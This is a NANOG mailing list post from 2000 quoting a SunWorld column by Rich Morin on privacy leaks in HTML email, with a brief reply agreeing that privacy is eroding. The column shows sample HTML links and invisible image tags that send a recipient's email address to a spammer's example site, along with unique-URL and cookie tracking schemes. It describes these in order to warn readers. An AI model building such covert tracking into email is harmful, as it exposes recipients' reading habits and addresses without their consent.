nanog mailing list archives
Re: Read an email, lose your privacy
From: Steve Sobol <sjsobol () NorthShoreTechnologies net>
Date: Mon, 10 Jan 2000 22:45:11 -0500
"Henry R. Linneweh" wrote:
http://www.sunworld.com/sunworldonline/swol-01-2000/swol-01-silicon.html
With an excellent, and I think appropriate, quote from Sun CEO Scott McNealy at the top of the article.
while I hope Scott McNealy is using hyperbole when he says, "You have zero privacy now. Get over it" (the PC Week "Quote of the Week," Feb. 1, 1999), it's not at all clear that he is.
I hardly think McNealy is exaggerating. Our privacy has been disappearing for years already.
Thank you;
|--------------------------------------------|
| Thinking is a learned process so is UNIX |
|--------------------------------------------|
Henry R. Linneweh
---------------------------------------------------------------
Advertisement: Support SunWorld, click here!
Read an email,
lose your
privacy
Email can be
spammer's weapon
in more ways
than one
Summary
Assorted
cyberprivacy
organizations
are
asking
regulators
to fix
a
privacy
leak
in Web
browser
software.
Rich
Morin
tells
us why
leaks
are
only a
small
part
of the
problem.
(1,000
words)
----------------
he
headline
shouted
"E-Mail
May Be Peril to
Privacy" from
the business
section's front
page in the San
Francisco
Chronicle.
Reading the
December 4
article by
Associated Press
writer Kalpana
Srinivasan, I
was happy to see
the issue
getting some attention but hardly surprised to hear about yet another
privacy threat. David Brin, the author of The Transparent Society,
writes that a lack of privacy is inevitable. Although I don't agree
with everything he says, the odds look pretty good that Brin might be
right about this.
And while I hope Scott McNealy is using hyperbole when he says, "You
have zero privacy now. Get over it" (the PC Week "Quote of the Week,"
Feb. 1, 1999), it's not at all clear that he is. Every time I'm asked
to have my signature digitized for posterity during a credit card
purchase (which I refuse, as a matter of principle), I am reminded of
just how invasive our society has become.
Hiding HTML links in email
Enough generalized paranoia, however. Let's look at some specific
threats.
Most Web browsers hide the HTML portion of a link, showing only a
highlighted word or two. Many email clients, particularly those
embedded in Web browsers, perform this service as well.
It is a useful feature, in most cases. After all, HTML code is both
bulky and mysterious; most email users have neither the expertise,
time, nor motivation to analyze every incoming bit of HTML.
Unfortunately, however, it can leave an unwary user open to privacy
attacks.
Let's say I get a piece of spam from a porn site, containing includes
the following bit of HTML:
<A HREF="http://www.smuttystuff.com";>www.smuttystuff.com</A>
No problem so far: www.smuttystuff.com is just a Website, so I should
be pretty anonymous visiting it. All the site will get from my visit,
in general, is an IP number or perhaps a domain name. The site can't
use either of those to send me more spam or identify me as a visitor.
Unfortunately, URLs can contain other items, including parameters that
can be transmitted back to the site:
<A HREF="http://www.smuttystuff.com?u=foo () bar com">www.smuttystuff.com</A>
If I take the bait and visit the site, my email address, foo () bar com,
can be put on a hot list. Of course, the site managers had already
obtained my address from an existing list, but they didn't know I
would take the offered bait. Now they do.
It gets worse. If I am using such a Web browser to handle my email,
even opening the email message may be enough to initiate a serious
loss of privacy. Many Web browsers are capable of enhancing email
messages with all sorts of (possibly invisible) images, retrieving
them when a message is opened from any specified URL. The spammer is
free to include an IMG tag that includes my email address in a
parameter, as follows:
<IMG SRC="http://www.smuttystuff.com/x.jpg?u=foo () bar com">
Wanna cookie?
The spammer now knows that I opened his message, but even that's not
the worst part. The Website can also return a cookie to my browser
containing my (possibly disguised) email address. This means that any
future visit I make to his site (or other, cooperating sites) can be
recorded and indexed to my email address.
In short, my privacy will have been severely compromised by my email
software, without my knowledge or permission. For more information on
this specific kind of attack, see the Electronic Frontier Foundation's
press release or the technical report by security expert Richard M.
Smith (in Resources, below).
Variations
These sorts of attacks can take many forms. For instance, it is quite
possible to eliminate the need for a parameter altogether. Let's say
the image request looks like this:
<IMG SRC="http://www.smuttystuff.com/blonds/susie_q.jpg";>
That seems pretty innocent, from a privacy perspective, but it might
not be. In one possible scenario, the spammer could generate a unique
URL for each outgoing email message, joining random names (susie,
tammy, ...) with random letters (q, r, and so on). As each piece of
email is sent, the spammer saves the outgoing email address in a
database, keyed by the unique portion (susie_q) of the URL.
When the image request is received, a hidden CGI script
(http://www.smuttystuff.com/blonds) can record the request in the
database, send me an identifying cookie, and so on. In short, any
image request could be tagged.
Finally, if I am foolish enough to click on an unknown URL, the
spammer doesn't need parameters or even "hidden" HTML:
http://www.smuttystuff.com/blonds/susie_q.html
The same logic applies: because the spammer knows whom he told about
susie_q, he knows who is asking to see the Web page. Welcome to
spamland, sucker.
Conclusions
One moral of this story, like that of Ken Thompson's classic paper,
"Reflections on Trusting Trust" (see Resources), is that Trojan horses
can come in many guises, and one should not trust a stranger's
offerings, even if they contain no visible threats.
Another moral is that convenient "features," made possible by
aggregating pieces of software (in this case, email and Web clients),
can lead to unexpected security holes. Microsoft is the most obvious
perpetrator here, but Netscape and others have contributed to the
situation.
In an environment where random miscreants can send email to
unsuspecting victims, keeping a few barriers in place seems only
prudent. The spate of emailed "macro viruses" provides a clear example
of the reasons.
Putting macros -- interpretable code -- into word processors and other
programs is clearly a powerful and useful idea. Having email software
start up a copy of the word processor, so you can read formatted mail,
is also quite convenient. Unfortunately, the combination means that
ill-wishers can run macros on a victim's machine merely by sending
email.
I don't have any global solutions to offer, but I can offer some
advice: Don't use Web browsers or highly integrated systems, such as
Microsoft Outlook, as email clients; they're far too accommodating to
spammers.
If you must use unsafe email software, try to use it in a conservative
manner. Turn off any automated features, such as automated program
invocation, that might allow others to take over your machine. Until
the vendors add some real security, the risks far outweigh any
possible convenience.
Editor's note: The domain name Smuttystuff.com was not registered at
the time this article was published. Any similarity to an existing
domain name or Website is purely coincidental. [Image]
About the author
Rich Morin operates Canta Forda Computer Laboratory, a
[Image]computer consulting firm specializing in open source
software. He lives in San Bruno, Calif., on the San Francisco
peninsula.
Home | Next Story | Mail this Story | Printer-Friendly Version |
Comment on this Story | Resources and Related Links
Advertisement: Support SunWorld, click here!
[Image]Resources and Related Links
* The Transparent Society, David Brin (Perseus Books, 1999):
http://www.perseusbooks.com
* Prepublication version of Chapter 1:
http://crit.org/http://crit.org/openness/sourcedocs/BrinCh1.html
* "The Cookie Leak Security Hole in HTML Email Messages," Richard
M. Smith:
http://www.tiac.net/users/smiths/privacy/cookleak.htm
* Electronic Frontier Foundation press release:
http://www.eff.org/pub/Privacy/Profiling/19991202_joint_profiling_pressrel.html
* "Reflections on Trusting Trust," Ken Thompson (Communication of
the ACM, August 1984):
http://www.acm.org/classics/sep95
Additional SunWorld resources
* Previous Silicon Carny columns in SunWorld:
http://www.sunworld.com/common/swol-backissues-columns.html#silicon
* The SunWorld Topical Index -- a comprehensive listing of all
SunWorld articles by subject:
http://www.sunworld.com/common/swol-siteindex.html
* Visit sunWHERE -- launchpad to hundreds of online resources for
Sun users:
http://www.sunworld.com/sunwhere.html
* Explore back issues of SunWorld:
http://www.sunworld.com/common/swol-backissues.html
* IDG.net, your one-stop IT resource:
http://www.idg.net
[Image] Tell Us What You Thought of This Story
-Very worth reading -Too long -Too technical
-Worth reading -Just right -Just right
-Not worth reading -Too short -Not technical enough
[(c) Copyright 2000 Web Publishing Inc., and IDG Communication company]
If you have technical problems with this magazine, contact
webmaster () sunworld com
URL: http://www.sunworld.com/swol-01-2000/swol-01-silicon.html
Last modified: Friday, January 07, 2000
![http://www.smuttystuff.com/blonds/susie_q.jpg"](http://www.smuttystuff.com/blonds/susie_q.jpg"){kind=link}
-- North Shore Technologies Corporation - Steven J. Sobol, President & Head Geek 815 Superior Avenue #610, Cleveland, Ohio 44114, USA Phone +1 888.480.4NET sjsobol () NorthShoreTechnologies net http://NorthShoreTechnologies.net Owned and loved by the dogs of Jaymist Chinese Shar-Pei, Montville, Ohio :) Alcohol and calculus don't mix.. Never drink and derive.
Current thread:
- Read an email, lose your privacy Henry R. Linneweh (Jan 10)
- Re: Read an email, lose your privacy Steve Sobol (Jan 10)
- Re: Read an email, lose your privacy I Am Not An Isp (Jan 11)
- Re: Read an email, lose your privacy Steve Sobol (Jan 10)